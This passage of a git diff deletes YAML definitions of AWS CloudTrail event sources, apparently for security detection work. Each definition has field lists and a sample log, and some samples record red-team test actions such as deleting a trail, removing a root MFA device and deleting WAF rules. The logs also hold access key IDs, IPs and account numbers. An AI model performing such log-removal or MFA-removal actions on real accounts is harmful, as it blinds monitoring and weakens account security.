-- requestParameters.logGroupName
-- requestParameters.logStreamName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:09:51Z", "eventSource": "logs.amazonaws.com", "eventName": "DeleteLogStream", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/logs.delete-log-stream", "requestParameters": {"logGroupName": "test-logs", "logStreamName": "20150601"}, "responseElements": null, "requestID": "2d7e859e-d697-426f-8b56-c4c11c4055f3", "eventID": "561c3f4e-17ca-4438-b15d-29903baf7b13", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "20140328", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml
deleted file mode 100644
index 9445114477..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml
+++ /dev/null
@@ -1,85 +0,0 @@
-event_name: AWS CloudTrail DeleteNetworkAclEntry
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.egress
-- requestParameters.networkAclId
-- requestParameters.ruleNumber
-- responseElements._return
-- responseElements.requestId
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T09:26:26Z", "eventSource": "ec2.amazonaws.com", "eventName": "DeleteNetworkAclEntry", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com", "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 40, "egress": false}, "responseElements": {"requestId": "607474bb-836b-46be-be4a-351ebbef67d6", "_return": true}, "requestID": "607474bb-836b-46be-be4a-351ebbef67d6", "eventID": "b9e05770-e9b0-4ba1-91e8-6537097e06e7", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml
deleted file mode 100644
index 4c9cd67561..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail DeletePolicy
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestID
-- requestParameters.policyArn
-- responseElements
-- result
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::151521547504:user/bhavin_cli", "accountId": "151521547504", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-04-02T18:01:00Z", "eventSource": "iam.amazonaws.com", "eventName": "DeletePolicy", "awsRegion": "us-east-1", "sourceIPAddress": "61.25.42.212", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-policy", "errorCode": "NoSuchEntityException", "errorMessage": "Policy arn:aws:iam::151521547504:policy/AtomicRedTeam was not found.", "requestParameters": {"policyArn": "arn:aws:iam::151521547504:policy/AtomicRedTeam"}, "responseElements": null, "requestID": "90cbe52f-e744-4bba-9f5c-1843c9ca1855", "eventID": "abd071bf-0a38-4fab-af4a-5eee55f0935e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "151521547504"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml
deleted file mode 100644
index abc2cc3457..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteRule
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.changeToken
-- requestParameters.ruleId
-- responseElements.changeToken
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:40:42Z", "eventSource": "waf.amazonaws.com", "eventName": "DeleteRule", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/waf.delete-rule", "requestParameters": {"changeToken": "c5daf4cb-68e1-425f-b52d-49a32a7f187f", "ruleId": "5a9b1c4a-a999-4bb2-9f51-555f086ff34f"}, "responseElements": {"changeToken": "c5daf4cb-68e1-425f-b52d-49a32a7f187f"}, "requestID": "2089be3e-28ea-4349-b505-db72c81c272a", "eventID": "0f815483-f6bb-42d9-b870-0dcc64ddc9a4", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml
deleted file mode 100644
index bce2759da8..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: AWS CloudTrail DeleteTrail
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.name
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-07-13T19:03:51Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "DeleteTrail", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/cloudtrail.delete-trail", "requestParameters": {"name": "redatomictesttrail"}, "responseElements": null, "requestID": "2ba0af54-1451-4a2c-846e-18436bcee01e", "eventID": "1c53bcce-650d-486a-b3f6-f64fd853e509", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml
deleted file mode 100644
index b337282ae5..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteVirtualMFADevice
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.serialNumber
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111", "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}}, "eventTime": "2022-10-04T16:13:46Z", "eventSource": "iam.amazonaws.com", "eventName": "DeleteVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters": {"serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"}, "responseElements": null, "requestID": "5f192b01-d59d-4cee-8880-cc5cc6fd9b43", "eventID": "01f0258f-b83f-4c0f-8fd3-380473840db8", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml
deleted file mode 100644
index 461d9d06c7..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteWebACL
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.changeToken
-- requestParameters.webACLId
-- responseElements.changeToken
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:32:54Z", "eventSource": "waf.amazonaws.com", "eventName": "DeleteWebACL", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/waf.delete-web-acl", "requestParameters": {"changeToken": "11eb19d6-d960-4398-8761-6a8fbf8fc425", "webACLId": "6a9771ff-7d94-4fec-a049-e42da0bc7347"}, "responseElements": {"changeToken": "11eb19d6-d960-4398-8761-6a8fbf8fc425"}, "requestID": "55fd5189-5f86-4052-8e8e-993faf1753e8", "eventID": "c8fd51ac-676d-4d5d-aa5a-7e642cf5bb97", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml
deleted file mode 100644
index ac48a3785c..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml
+++ /dev/null
@@ -1,74 +0,0 @@
-event_name: AWS CloudTrail DescribeEventAggregates
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.aggregateField
-- requestParameters.filter.eventStatusCodes{}
-- requestParameters.filter.startTimes{}.from
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527", "accessKeyId": "ASIASBMSCQHHQQ6LB24V", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-31T21:58:17Z", "mfaAuthenticated": "true"}}}, "eventTime": "2023-02-01T02:52:34Z", "eventSource": "health.amazonaws.com", "eventName": "DescribeEventAggregates", "awsRegion": "us-east-1", "sourceIPAddress": "54.188.0.152", "userAgent": "AWS Internal", "requestParameters": {"aggregateField": "eventTypeCategory", "filter": {"eventStatusCodes": ["open", "upcoming"], "startTimes": [{"from": "Jan 25, 2023 2:54:32 AM"}]}}, "responseElements": null, "requestID": "d6adf050-1d7a-4c25-9d48-0319e33f6f9a", "eventID": "201cee69-61ab-4ffb-80b7-bd31e81e0d82", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml
deleted file mode 100644
index 0fbf4c9740..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml
+++ /dev/null
@@ -1,104 +0,0 @@
-event_name: AWS CloudTrail DescribeImageScanFindings
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.imageId.imageDigest
-- requestParameters.maxResults
-- requestParameters.repositoryName
-- responseElements.imageId.imageDigest
-- responseElements.imageScanFindings.findingSeverityCounts.HIGH
-- responseElements.imageScanFindings.findingSeverityCounts.INFORMATIONAL
-- responseElements.imageScanFindings.findingSeverityCounts.LOW
-- responseElements.imageScanFindings.findingSeverityCounts.MEDIUM
-- responseElements.imageScanFindings.findingSeverityCounts.UNDEFINED
-- responseElements.imageScanFindings.findings{}.attributes{}.key
-- responseElements.imageScanFindings.findings{}.attributes{}.value
-- responseElements.imageScanFindings.findings{}.description
-- responseElements.imageScanFindings.findings{}.name
-- responseElements.imageScanFindings.findings{}.severity
-- responseElements.imageScanFindings.findings{}.uri
-- responseElements.imageScanFindings.imageScanCompletedAt
-- responseElements.imageScanFindings.vulnerabilitySourceUpdatedAt
-- responseElements.imageScanStatus.description
-- responseElements.imageScanStatus.status
-- responseElements.registryId
-- responseElements.repositoryName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AAAAAAAAAAAAAAAAAAAAA:test@test.com", "arn": "arn:aws:sts::111111111111:assumed-role/role_name/test@test.com", "accountId": "111111111111", "accessKeyId": "AKIAIOSFODNN7EXAMPLE", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AKIAIOSFODNN7EXAMPLE", "arn": "arn:aws:iam::111111111111:role/aws-reserved/test/region/group", "accountId": "111111111111", "userName": "test"}, "webIdFederationData": {}, "attributes": {"creationDate": "2021-08-11T09:42:53Z", "mfaAuthenticated": "false"}}}, "eventTime": "2021-08-11T11:52:27Z", "eventSource": "ecr.amazonaws.com", "eventName": "DescribeImageScanFindings", "awsRegion": "eu-central-1", "sourceIPAddress": "154.16.165.133", "userAgent": "aws-internal/3 aws-sdk-java/1.11.1030 Linux/4.9.273-0.1.ac.226.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08 java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/legacy", "requestParameters": {"repositoryName": "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"}, "maxResults": 1000}, "responseElements": {"registryId": "111111111111", "repositoryName": "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"}, "imageScanStatus": {"status": "COMPLETE", "description": "The scan was completed successfully."}, "imageScanFindings": {"imageScanCompletedAt": "Aug 11, 2021, 11:30:16 AM", "vulnerabilitySourceUpdatedAt": "Aug 11, 2021, 1:17:52 AM", "findings": [{"name": "CVE-2019-25013", "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-25013", "severity": "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"}, 
{"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.1"}]}, {"name": "CVE-2021-33574", "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-33574", "severity": "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-12886", "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-12886", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "8.3.0-6"}, {"key": "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-1751", "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. 
The highest threat from this vulnerability is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1751", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:C"}, {"key": "CVSS2_SCORE", "value": "5.9"}]}, {"name": "CVE-2021-3326", "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3326", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-35942", "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-35942", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "6.4"}]}, {"name": "CVE-2019-12904", "description": "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload side-channel attack because physical addresses are available to other processes. 
(The C implementation is used on platforms where an assembly-language implementation is unavailable.)", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12904", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-6363", "description": "** DISPUTED ** In the GD Graphics Library (aka LibGD) through 2.2.5, there is a heap-based buffer over-read in tiffWriter in gd_tiff.c. NOTE: the vendor says \"In my opinion this issue should not have a CVE, since the GD and GD2 formats are documented to be ''obsolete, and should only be used for development and testing purposes.''\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-6363", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"}, {"key": "package_name", "value": "libgd2"}, {"key": 